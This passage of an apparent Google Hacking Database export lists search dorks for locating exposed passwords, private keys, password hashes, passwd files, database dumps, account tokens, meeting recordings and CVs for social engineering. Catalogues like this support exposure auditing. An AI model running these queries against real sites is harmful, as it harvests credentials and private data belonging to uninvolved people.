<querystring>https://www.google.com/search?q=site:github.com inurl:&quot;known_hosts&quot; &quot;ssh-rsa&quot;</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>7655</id>
<link>https://www.exploit-db.com/ghdb/7655</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gitlab.* intext:password intext:@gmail.com | @yahoo.com | @hotmail.com</shortDescription>
<textualDescription># Google Dork: site:gitlab.* intext:password intext:@gmail.com | @yahoo.com | @hotmail.com
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Jorge Manuel Lozano Gómez</textualDescription>
<query>site:gitlab.* intext:password intext:@gmail.com | @yahoo.com | @hotmail.com</query>
<querystring>https://www.google.com/search?q=site:gitlab.* intext:password intext:@gmail.com | @yahoo.com | @hotmail.com</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Jorge Manuel Lozano Gómez</author>
</entry>
<entry>
<id>5217</id>
<link>https://www.exploit-db.com/ghdb/5217</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:global.gotomeeting.com inurl:recording</shortDescription>
<textualDescription>Description: Find recorded meetings of people who used GoToMeeting for a
conference call or meeting. You can also download the full recording.
Category: Files Containing Juicy Info
Author: edm0nd https://twitter.com/edmond_major
</textualDescription>
<query>site:global.gotomeeting.com inurl:recording</query>
<querystring>https://www.google.com/search?q=site:global.gotomeeting.com inurl:recording</querystring>
<edb></edb>
<date>2019-05-16</date>
<author>edm0nd</author>
</entry>
<entry>
<id>6665</id>
<link>https://www.exploit-db.com/ghdb/6665</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov ext:sql | ext:dbf | ext:mdb</shortDescription>
<textualDescription># Google Dork: site:gov ext:sql | ext:dbf | ext:mdb
# sensitive uploaded contents from websites
# Author : ANURAG K P
</textualDescription>
<query>site:gov ext:sql | ext:dbf | ext:mdb</query>
<querystring>https://www.google.com/search?q=site:gov ext:sql | ext:dbf | ext:mdb</querystring>
<edb></edb>
<date>2020-11-16</date>
<author>ANURAG K P</author>
</entry>
<entry>
<id>7873</id>
<link>https://www.exploit-db.com/ghdb/7873</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov intitle:&quot;index of&quot; *.data</shortDescription>
<textualDescription># Google Dork: site:gov intitle:&quot;index of&quot; *.data
# Files Containing Juicy Info
# Date:06/12/2021
# Exploit Author: NAHID
Proof Of Concept:
</textualDescription>
<query>site:gov intitle:&quot;index of&quot; *.data</query>
<querystring>https://www.google.com/search?q=site:gov intitle:&quot;index of&quot; *.data</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>NAHID</author>
</entry>
<entry>
<id>7833</id>
<link>https://www.exploit-db.com/ghdb/7833</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov.* intitle:&quot;index of&quot; *.apk</shortDescription>
<textualDescription># Google Dork: site:gov.* intitle:&quot;index of&quot; *.apk
# Files Containing Juicy Info
# Date:17/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>site:gov.* intitle:&quot;index of&quot; *.apk</query>
<querystring>https://www.google.com/search?q=site:gov.* intitle:&quot;index of&quot; *.apk</querystring>
<edb></edb>
<date>2021-11-18</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7853</id>
<link>https://www.exploit-db.com/ghdb/7853</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov.* intitle:&quot;index of&quot; *.css</shortDescription>
<textualDescription># Google Dork: site:gov.* intitle:&quot;index of&quot; *.css
# Files Containing Juicy Info
# Date:14/06/2022
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>site:gov.* intitle:&quot;index of&quot; *.css</query>
<querystring>https://www.google.com/search?q=site:gov.* intitle:&quot;index of&quot; *.css</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7834</id>
<link>https://www.exploit-db.com/ghdb/7834</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov.* intitle:&quot;index of&quot; *.csv</shortDescription>
<textualDescription># Google Dork: site:gov.* intitle:&quot;index of&quot; *.csv
# Files Containing Juicy Info
# Date: 18/11/2021
# Exploit Author: Midhun Mohanan
</textualDescription>
<query>site:gov.* intitle:&quot;index of&quot; *.csv</query>
<querystring>https://www.google.com/search?q=site:gov.* intitle:&quot;index of&quot; *.csv</querystring>
<edb></edb>
<date>2021-11-19</date>
<author>Midhun Mohanan</author>
</entry>
<entry>
<id>7903</id>
<link>https://www.exploit-db.com/ghdb/7903</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov.* intitle:&quot;index of&quot; *.db</shortDescription>
<textualDescription># Google Dork: site:gov.* intitle:&quot;index of&quot; *.db
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>site:gov.* intitle:&quot;index of&quot; *.db</query>
<querystring>https://www.google.com/search?q=site:gov.* intitle:&quot;index of&quot; *.db</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>7874</id>
<link>https://www.exploit-db.com/ghdb/7874</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov.* intitle:&quot;index of&quot; *.doc</shortDescription>
<textualDescription># Google Dork: site:gov.* intitle:&quot;index of&quot; *.doc
# Files Containing Juicy Info
# Date:06/12/2021
# Exploit Author: NAHID</textualDescription>
<query>site:gov.* intitle:&quot;index of&quot; *.doc</query>
<querystring>https://www.google.com/search?q=site:gov.* intitle:&quot;index of&quot; *.doc</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>NAHID</author>
</entry>
<entry>
<id>7900</id>
<link>https://www.exploit-db.com/ghdb/7900</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov.* intitle:&quot;index of&quot; *.php</shortDescription>
<textualDescription># Google Dork: site:gov.* intitle:&quot;index of&quot; *.php
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>site:gov.* intitle:&quot;index of&quot; *.php</query>
<querystring>https://www.google.com/search?q=site:gov.* intitle:&quot;index of&quot; *.php</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>7876</id>
<link>https://www.exploit-db.com/ghdb/7876</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov.* intitle:&quot;index of&quot; *.pptx</shortDescription>
<textualDescription># Google Dork: site:gov.* intitle:&quot;index of&quot; *.pptx
# Files Containing Juicy Info
# Date:06/12/2021
# Exploit Author: NAHID</textualDescription>
<query>site:gov.* intitle:&quot;index of&quot; *.pptx</query>
<querystring>https://www.google.com/search?q=site:gov.* intitle:&quot;index of&quot; *.pptx</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>NAHID</author>
</entry>
<entry>
<id>7901</id>
<link>https://www.exploit-db.com/ghdb/7901</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov.* intitle:&quot;index of&quot; *.shell</shortDescription>
<textualDescription># Google Dork: site:gov.* intitle:&quot;index of&quot; *.shell
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>site:gov.* intitle:&quot;index of&quot; *.shell</query>
<querystring>https://www.google.com/search?q=site:gov.* intitle:&quot;index of&quot; *.shell</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>7878</id>
<link>https://www.exploit-db.com/ghdb/7878</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov.* intitle:&quot;index of&quot; *.xls</shortDescription>
<textualDescription># Google Dork: site:gov.* intitle:&quot;index of&quot; *.xls
# Files Containing Juicy Info
# Date:06/12/2021
# Exploit Author: NAHID
</textualDescription>
<query>site:gov.* intitle:&quot;index of&quot; *.xls</query>
<querystring>https://www.google.com/search?q=site:gov.* intitle:&quot;index of&quot; *.xls</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>NAHID</author>
</entry>
<entry>
<id>7852</id>
<link>https://www.exploit-db.com/ghdb/7852</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov.* intitle:&quot;index of&quot; *Dokuments&quot;</shortDescription>
<textualDescription># Google Dork: site:gov.* intitle:&quot;index of&quot; *Dokuments&quot;
# Files Containing Juicy Info
# Date:14/06/2022
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>site:gov.* intitle:&quot;index of&quot; *Dokuments&quot;</query>
<querystring>https://www.google.com/search?q=site:gov.* intitle:&quot;index of&quot; *Dokuments&quot;</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7699</id>
<link>https://www.exploit-db.com/ghdb/7699</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:gov.hk intitle:index of /</shortDescription>
<textualDescription># Google Dork: site:gov.hk intitle:index of /
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Nithissh S</textualDescription>
<query>site:gov.hk intitle:index of /</query>
<querystring>https://www.google.com/search?q=site:gov.hk intitle:index of /</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Nithissh S</author>
</entry>
<entry>
<id>5273</id>
<link>https://www.exploit-db.com/ghdb/5273</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:https://docs.google.com/forms responses</shortDescription>
<textualDescription>site:https://docs.google.com/forms responses
Description:
This dork allows to view form analytics and responses of generated
google forms
</textualDescription>
<query>site:https://docs.google.com/forms responses</query>
<querystring>https://www.google.com/search?q=site:https://docs.google.com/forms responses</querystring>
<edb></edb>
<date>2019-07-08</date>
<author>Eliezer Rabadon</author>
</entry>
<entry>
<id>5274</id>
<link>https://www.exploit-db.com/ghdb/5274</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:https://docs.google.com/forms viewanalytics</shortDescription>
<textualDescription>site:https://docs.google.com/forms viewanalytics
Description:
This dork allows you to view form analytics of generated google forms.
</textualDescription>
<query>site:https://docs.google.com/forms viewanalytics</query>
<querystring>https://www.google.com/search?q=site:https://docs.google.com/forms viewanalytics</querystring>
<edb></edb>
<date>2019-07-08</date>
<author>Eliezer Rabadon</author>
</entry>
<entry>
<id>5276</id>
<link>https://www.exploit-db.com/ghdb/5276</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:https://docs.google.com/spreadsheets edit</shortDescription>
<textualDescription>site:https://docs.google.com/spreadsheets edit
Exploit Title: Get all editable spreadsheets of from google spreadsheet
Author: Eliezer Rabadon</textualDescription>
<query>site:https://docs.google.com/spreadsheets edit</query>
<querystring>https://www.google.com/search?q=site:https://docs.google.com/spreadsheets edit</querystring>
<edb></edb>
<date>2019-07-12</date>
<author>Eliezer Rabadon</author>
</entry>
<entry>
<id>5275</id>
<link>https://www.exploit-db.com/ghdb/5275</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:https://docs.google.com/spreadsheets responses</shortDescription>
<textualDescription># Exploit Title: Get all responses from Google Spreadsheet
# Google Dork: site:https://docs.google.com/spreadsheets responses
# Author: Francis Al Victoriano
</textualDescription>
<query>site:https://docs.google.com/spreadsheets responses</query>
<querystring>https://www.google.com/search?q=site:https://docs.google.com/spreadsheets responses</querystring>
<edb></edb>
<date>2019-07-11</date>
<author>Francis Al Victoriano</author>
</entry>
<entry>
<id>8050</id>
<link>https://www.exploit-db.com/ghdb/8050</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:investor.*.* AND inurl:home/default.aspx</shortDescription>
<textualDescription># Google Dork: site:investor.*.* AND inurl:home/default.aspx
# Files Containing Juicy Info
# Date: 12/10/2022
# Exploit Author: Salah Eddine Louffidi</textualDescription>
<query>site:investor.*.* AND inurl:home/default.aspx</query>
<querystring>https://www.google.com/search?q=Q4Web &quot;Q4 Inc. - Investor Relations Tools &amp; Services | IR CRM | Q4&quot; [Google Dork]</querystring>
<edb></edb>
<date>2023-02-02</date>
<author>SALAH EDDINE LOUFFIDI</author>
</entry>
<entry>
<id>8260</id>
<link>https://www.exploit-db.com/ghdb/8260</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:linkedin.com intitle:&quot;@gmail&quot;</shortDescription>
<textualDescription># Google Dork: site:linkedin.com intitle:&quot;@gmail&quot;
# Files Containing Juicy Info
# Date: 16/10/2023
# Exploit Shiva Medituru</textualDescription>
<query>site:linkedin.com intitle:&quot;@gmail&quot;</query>
<querystring>https://www.google.com/search?q=site:linkedin.com intitle:&quot;@gmail&quot;</querystring>
<edb></edb>
<date>2023-10-16</date>
<author>Shiva Medituru</author>
</entry>
<entry>
<id>8334</id>
<link>https://www.exploit-db.com/ghdb/8334</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:login.*.* | site:portal.*.*</shortDescription>
<textualDescription># Google Dork: site:login.*.* | site:portal.*.*
# Files Containing Juicy Info
# Date: 08/11/2024
# Exploit Author: Anas Zakir
</textualDescription>
<query>site:login.*.* | site:portal.*.*</query>
<querystring>https://www.google.com/search?q=site:login.*.* | site:portal.*.*</querystring>
<edb></edb>
<date>2023-11-08</date>
<author>Anas Zakir</author>
</entry>
<entry>
<id>3730</id>
<link>https://www.exploit-db.com/ghdb/3730</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:mediafire.com cv Or resume OR curriculum vitae filetype:pdf OR doc</shortDescription>
<textualDescription>Searches Mediafire for publicly avaliable PDF's containing information used in
a CV/Resume/Curriculum Vitae which can therefore be used in a Social
Engineering based vector attack
--
Trevor Starick</textualDescription>
<query>site:mediafire.com cv Or resume OR curriculum vitae filetype:pdf OR doc</query>
<querystring>https://www.google.com/search?q=site:mediafire.com cv Or resume OR curriculum vitae filetype:pdf OR doc</querystring>
<edb></edb>
<date>2011-07-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>5604</id>
<link>https://www.exploit-db.com/ghdb/5604</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:mypublicinbox.com intitle:email</shortDescription>
<textualDescription>Helps to locate public profiles of MyPublicInbox platform -there is no search form yet-. My Public Inbox is a new way of communication focused on experts of all sectors where they can facilitate their personal contact without exposing it against SPAM, phishing attacks… and so valuating their time. More info: (https://www.mypublicinbox.com) (https://www.elladodelmal.com/2019/10/mypublicinbox-un-proyecto-para-el-dia.html)
Gerard Fuguet</textualDescription>
<query>site:mypublicinbox.com intitle:email</query>
<querystring>https://www.google.com/search?q=site:mypublicinbox.com intitle:email</querystring>
<edb></edb>
<date>2019-10-29</date>
<author>Gerard Fuguet</author>
</entry>
<entry>
<id>7877</id>
<link>https://www.exploit-db.com/ghdb/7877</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:org.* intitle:&quot;index of&quot; * resources</shortDescription>
<textualDescription># Google Dork: site:org.* intitle:&quot;index of&quot; * resources
# Files Containing Juicy Info
# Date: 06/12/2021
# Exploit Author: NAHID</textualDescription>
<query>site:org.* intitle:&quot;index of&quot; * resources</query>
<querystring>https://www.google.com/search?q=site:org.* intitle:&quot;index of&quot; * resources</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>NAHID</author>
</entry>
<entry>
<id>7838</id>
<link>https://www.exploit-db.com/ghdb/7838</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:papaly.com + keyword</shortDescription>
<textualDescription># Google Dork: site:papaly.com + keyword
# Files Containing Juicy Info
# Date:18/11/2021
# Exploit Author: Gabriel Tarsia</textualDescription>
<query>site:papaly.com + keyword</query>
<querystring>https://www.google.com/search?q=site:papaly.com + keyword</querystring>
<edb></edb>
<date>2021-11-19</date>
<author>Gabriel Tarsia</author>
</entry>
<entry>
<id>7705</id>
<link>https://www.exploit-db.com/ghdb/7705</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:pastebin.com &quot;*@gmail.com password&quot;</shortDescription>
<textualDescription># Google Dork: site:pastebin.com &quot;*@gmail.com password&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Anirudh Kumar Kushwaha</textualDescription>
<query>site:pastebin.com &quot;*@gmail.com password&quot;</query>
<querystring>https://www.google.com/search?q=site:pastebin.com &quot;*@gmail.com password&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Anirudh Kumar Kushwaha</author>
</entry>
<entry>
<id>7374</id>
<link>https://www.exploit-db.com/ghdb/7374</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:pastebin.com intext:&quot;-----BEGIN CERTIFICATE-----&quot;</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intext:&quot;-----BEGIN CERTIFICATE-----&quot;
# Files Containing Juicy Info
# Date:30/09/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>site:pastebin.com intext:&quot;-----BEGIN CERTIFICATE-----&quot;</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:&quot;-----BEGIN CERTIFICATE-----&quot;</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>7375</id>
<link>https://www.exploit-db.com/ghdb/7375</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:pastebin.com intext:&quot;-----BEGIN RSA PRIVATE KEY-----&quot;</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intext:&quot;-----BEGIN RSA PRIVATE KEY-----&quot;
# Files Containing Juicy Info
# Date:30/09/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>site:pastebin.com intext:&quot;-----BEGIN RSA PRIVATE KEY-----&quot;</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:&quot;-----BEGIN RSA PRIVATE KEY-----&quot;</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>7376</id>
<link>https://www.exploit-db.com/ghdb/7376</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:pastebin.com intext:&quot;:aad3b435b51404eeaad3b435b51404ee:&quot;</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intext:&quot;:aad3b435b51404eeaad3b435b51404ee:&quot;
# Files Containing Juicy Info
# Date:30/09/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>site:pastebin.com intext:&quot;:aad3b435b51404eeaad3b435b51404ee:&quot;</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:&quot;:aad3b435b51404eeaad3b435b51404ee:&quot;</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>7529</id>
<link>https://www.exploit-db.com/ghdb/7529</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:pastebin.com intext:&quot;administrator:500:&quot;</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intext:&quot;administrator:500:&quot;
# Files Containing Juicy Info
# Date:29/10/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>site:pastebin.com intext:&quot;administrator:500:&quot;</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:&quot;administrator:500:&quot;</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>7519</id>
<link>https://www.exploit-db.com/ghdb/7519</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:pastebin.com intext:license key | expiration</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intext:license key | expiration
# Files Containing Juicy Info
# Date:28/10/2021
# Exploit Author: Jorge Manuel Lozano Gómez</textualDescription>
<query>site:pastebin.com intext:license key | expiration</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:license key | expiration</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>Jorge Manuel Lozano Gómez</author>
</entry>
<entry>
<id>7403</id>
<link>https://www.exploit-db.com/ghdb/7403</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:pastebin.com intext:root: &amp; :0: &amp; ::: | intitle:passwd | shadow</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intext:root: &amp; :0: &amp; ::: | intitle:passwd | shadow
# Files Containing Juicy Info
# Date: 07/10/2021
# Exploit Author: Arav Budhiraja</textualDescription>
<query>site:pastebin.com intext:root: &amp; :0: &amp; ::: | intitle:passwd | shadow</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:root: &amp; :0: &amp; ::: | intitle:passwd | shadow</querystring>
<edb></edb>
<date>2021-10-08</date>
<author>Arav Budhiraja</author>
</entry>
<entry>
<id>7520</id>
<link>https://www.exploit-db.com/ghdb/7520</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:pastebin.com intext:username | password | secret_key | token</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intext:username | password | secret_key | token
# Files Containing Juicy Info
# Date:29/10/2021
# Exploit Author: Jorge Manuel Lozano Gómez
</textualDescription>
<query>site:pastebin.com intext:username | password | secret_key | token</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intext:username | password | secret_key | token</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>Jorge Manuel Lozano Gómez</author>
</entry>
<entry>
<id>7825</id>
<link>https://www.exploit-db.com/ghdb/7825</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:pastebin.com intitle:&quot;cpanel&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;R WebServer&quot;
# Files Containing Juicy Info
# Date: 17/11/2021
# Exploit Author: Ishani Dhar</textualDescription>
<query>site:pastebin.com intitle:&quot;cpanel&quot;</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intitle:&quot;cpanel&quot;</querystring>
<edb></edb>
<date>2021-11-18</date>
<author>Ishani Dhar</author>
</entry>
<entry>
<id>7410</id>
<link>https://www.exploit-db.com/ghdb/7410</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:pastebin.com intitle:&quot;leak&quot; | &quot;breach&quot; intext:&quot;password&quot; | &quot;pw&quot; | &quot;pwd&quot;</shortDescription>
<textualDescription># Google Dork: site:pastebin.com intitle:&quot;leak&quot; | &quot;breach&quot; intext:&quot;password&quot; | &quot;pw&quot; | &quot;pwd&quot;
# Files Containing Juicy Info
# Date:08/10/2021
# Exploit Author: Aftab Alam</textualDescription>
<query>site:pastebin.com intitle:&quot;leak&quot; | &quot;breach&quot; intext:&quot;password&quot; | &quot;pw&quot; | &quot;pwd&quot;</query>
<querystring>https://www.google.com/search?q=site:pastebin.com intitle:&quot;leak&quot; | &quot;breach&quot; intext:&quot;password&quot; | &quot;pw&quot; | &quot;pwd&quot;</querystring>
<edb></edb>
<date>2021-10-11</date>
<author>Aftab Alam</author>
</entry>
<entry>
<id>7828</id>
<link>https://www.exploit-db.com/ghdb/7828</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:postman.com + keyword</shortDescription>
<textualDescription># Google Dork: site:postman.com + keyword
# Description: This dork returns public postman API collections
# Files Containing Juicy Info
# Date: 17/11/2021
# Exploit Author: Gabriel Tarsia</textualDescription>
<query>site:postman.com + keyword</query>
<querystring>https://www.google.com/search?q=site:postman.com + keyword</querystring>
<edb></edb>
<date>2021-11-18</date>
<author>Gabriel Tarsia</author>
</entry>
<entry>
<id>8356</id>
<link>https://www.exploit-db.com/ghdb/8356</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:s3.amazonaws.com &quot;index of /&quot;</shortDescription>
<textualDescription># Google Dork: site:s3.amazonaws.com &quot;index of /&quot;
# Files Containing Juicy Info
# Date: 24/11/2023
# Exploit: Jessar Qais</textualDescription>
<query>site:s3.amazonaws.com &quot;index of /&quot;</query>
<querystring>https://www.google.com/search?q=site:s3.amazonaws.com &quot;index of /&quot;</querystring>
<edb></edb>
<date>2023-11-24</date>
<author>Jessar Qais</author>
</entry>
<entry>
<id>3731</id>
<link>https://www.exploit-db.com/ghdb/3731</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:stashbox.org cv Or resume OR curriculum vitae filetype:pdf OR doc</shortDescription>
<textualDescription>Searches StashBox for publicly avaliable PDF's or .doc files
containing information used in
a CV/Resume/Curriculum Vitae which can therefore be used in a Social
Engineering based vector attack
--
Trevor Starick</textualDescription>
<query>site:stashbox.org cv Or resume OR curriculum vitae filetype:pdf OR doc</query>
<querystring>https://www.google.com/search?q=site:stashbox.org cv Or resume OR curriculum vitae filetype:pdf OR doc</querystring>
<edb></edb>
<date>2011-07-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4072</id>
<link>https://www.exploit-db.com/ghdb/4072</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini</shortDescription>
<textualDescription>Dork;
site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
This dork will search for any configuration files a target or targets may
have.
You can change in site:target.com - to target:edu (for education targets)
By Kevin Mark</textualDescription>
<query>site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini</query>
<querystring>https://www.google.com/search?q=site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini</querystring>
<edb></edb>
<date>2015-09-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4083</id>
<link>https://www.exploit-db.com/ghdb/4083</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:ws.kik.com | site:ws2.kik.com k=</shortDescription>
<textualDescription>Google Dork: site:ws.kik.com | site:ws2.kik.com k=
Date: September 16th, 2015
Exploit Author: Matthew Blankenship
Description: Shows usernames, emails, and verification tokens for kik messenger accounts.
</textualDescription>
<query>site:ws.kik.com | site:ws2.kik.com k=</query>
<querystring>https://www.google.com/search?q=site:ws.kik.com | site:ws2.kik.com k=</querystring>
<edb></edb>
<date>2015-09-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>1044</id>
<link>https://www.exploit-db.com/ghdb/1044</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:www.mailinator.com inurl:ShowMail.do</shortDescription>
<textualDescription>Mailinator.com allows people to use temporary email boxes. Read the site, I won't explain here. Anyway, there are emails in this site that have no password protection and potentially contain usernames, passwords, and email data. The only lock against unwanted viewers is the email address which can be randomized.</textualDescription>
<query>site:www.mailinator.com inurl:ShowMail.do</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=site%3Awww.mailinator.com+inurl%3AShowMail.do</querystring>
<edb></edb>
<date>2005-07-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>8278</id>
<link>https://www.exploit-db.com/ghdb/8278</link>
<category>Files Containing Juicy Info</category>
<shortDescription>site:www.openbugbounty.org intext:&quot;xss&quot; intext:&quot;Unpatched&quot;</shortDescription>
<textualDescription># Google Dork: site:www.openbugbounty.org intext:&quot;xss&quot; intext:&quot;Unpatched&quot;
# Files Containing Juicy Info
# Date: 25/10/2023
# Exploit Sachin Gupta</textualDescription>
<query>site:www.openbugbounty.org intext:&quot;xss&quot; intext:&quot;Unpatched&quot;</query>
<querystring>https://www.google.com/search?q=site:www.openbugbounty.org intext:&quot;xss&quot; intext:&quot;Unpatched&quot;</querystring>
<edb></edb>
<date>2023-10-25</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>8</id>
<link>https://www.exploit-db.com/ghdb/8</link>
<category>Files Containing Juicy Info</category>
<shortDescription>sQL data dumps</shortDescription>
<textualDescription>SQL database dumps. LOTS of data in these. So much data, infact, I'm pressed to think of what else an ev1l hax0r would like to know about a target database.. What's that? Usernames and passwords you say? Patience, grasshopper.....</textualDescription>
<query>&quot;# Dumping data for table&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22%23+Dumping+data+for+table%22</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>1</id>
<link>https://www.exploit-db.com/ghdb/1</link>
<category>Files Containing Juicy Info</category>
<shortDescription>squid cache server reports</shortDescription>
<textualDescription>These are squid server cache reports. Fairly benign, really except when you consider using them for evil purposes. For example, an institution stands up a proxy server for their internal users to get to the outside world. Then, the internal user surf all over to their hearts content (including intranet pages cuz well, the admins are stupid) Voila, intranet links show up in the external cache report. Want to make matters worse for yourself as an admin? OK, configure your external proxy server as a trusted internal host. Load up your web browser, set your proxy as their proxy and surf your way into their intranet. Not that I've noticed any examples of this in this google list. *COUGH* *COUGH* *COUGH* unresolved DNS lookups give clues *COUGH* *COUGH* ('scuse me. must be a furball) OK, lets say BEST CASE scenario. Let's say there's not security problems revealed in these logs. Best case scenario is that outsiders can see what your company/agency/workers are surfing.</textualDescription>
<query>&quot;cacheserverreport for&quot; &quot;This analysis was produced by calamaris&quot;</query>
<querystring>https://www.google.com/search?q=%22cacheserverreport+for%22+%22This+analysis+was+produced+by+calamaris%22</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>4911</id>
<link>https://www.exploit-db.com/ghdb/4911</link>
<category>Files Containing Juicy Info</category>
<shortDescription>swiftmailer intitle:&quot;index of&quot; &quot;smtp.yml&quot; | &quot;smtp.xml&quot;</shortDescription>
<textualDescription>This dork might give passwords and server directoies with juicy info.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>swiftmailer intitle:&quot;index of&quot; &quot;smtp.yml&quot; | &quot;smtp.xml&quot;</query>
<querystring>https://www.google.com/search?q=swiftmailer intitle:&quot;index of&quot; &quot;smtp.yml&quot; | &quot;smtp.xml&quot;</querystring>
<edb></edb>
<date>2018-08-13</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>299</id>
<link>https://www.exploit-db.com/ghdb/299</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Unreal IRCd</shortDescription>
